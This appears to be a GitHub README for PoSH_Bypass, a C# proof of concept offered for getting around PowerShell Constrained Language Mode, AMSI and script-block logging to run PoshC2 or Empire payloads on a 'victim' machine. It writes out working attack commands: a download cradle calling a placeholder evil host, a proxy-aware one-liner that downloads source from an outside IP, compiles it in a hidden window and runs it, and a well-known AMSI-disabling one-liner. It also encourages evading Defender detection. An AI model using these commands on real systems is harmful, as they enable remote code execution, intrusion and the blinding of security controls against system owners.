Skip to content

Latest commit

 

History

History
35 lines (25 loc) · 6.65 KB

README.md

File metadata and controls

35 lines (25 loc) · 6.65 KB

PoSH_Bypass

PoSHBypass is a payload and console proof of concept that allows an attatcker or for that matter a legitimate user to bypass PowerShell's 'Constrianed Language Mode, AMSI and ScriptBlock and Module logging'. The bulk of this concept is the combination of 3 separate pieces of research, I've stuck these 3 elements together as my first attempt at non 'Hello World!' C# project.

PoSH_Bypass_Payload

In order to make use of this payload all that is required is a newly generated Base64 encoded payload form PoshC2 or Empire or which ever framework you chose, I've tested it with PoschC2 and Empire. Just take the encoded section from the appropriate payload and paste it straight into the string Payload section of the code. Now just have Visual Studio compile the payload.

How you get this payload to your victim is upto you, but remember you are dealing with constrained language mode, so your standard download cradle's utilising

IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

Won't work Something like this could help out though;

$ua = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-GB)';$uri = 'http://192.168.32.143:8000/sourcecode.txt';$IESettings = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings';if ($IESettings.ProxyEnable -eq 1){$Proxy = "http://$(($IESettings.ProxyServer.Split(';') | ? {$_ -match 'ttp='}) -replace '.*=')";$request = Invoke-WebRequest -uri $uri -UserAgent $ua -ProxyUseDefaultCredentials -Proxy $proxy} else {$request = Invoke-WebRequest -uri $uri -UserAgent $ua };$request.Content | Out-File $env:userprofile\AppData\Local\Temp\sourcecode.txt;Start-Process -FilePath "$env:SystemRoot\Microsoft.NET\Framework\v4.0.30319\csc.exe" -ArgumentList "/unsafe /out:$env:userprofile\AppData\Local\Temp\Program.exe $env:userprofile\AppData\Local\Temp\sourcecode.txt" -WindowStyle Hidden -Wait;Start-Process -FilePath "$env:userprofile\AppData\Local\Temp\Program.exe" -WindowStyle Hidden

The above uses Invoke-Webrequest and is web proxy aware, it downloads, compiles and runs the payload.

PoSh_Bypass

Just compile this code and its ready to use, drop it on the box and run it, a new PowerShell window will open up and you'll be able to use it just as normal, without Constrained Mode or ScriptBlock logging, one thing I haven't sorted out is automatic AMSI bypass, (down to my lack of C# knowlegde no doubt :;). So to counter AMSI the first command you should enter is the bypass command given my Matt Graeber.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

There's a good chance this might actually get picked up by Defender, so you'll have to be creative to avoid the detection, but thats part of the fun.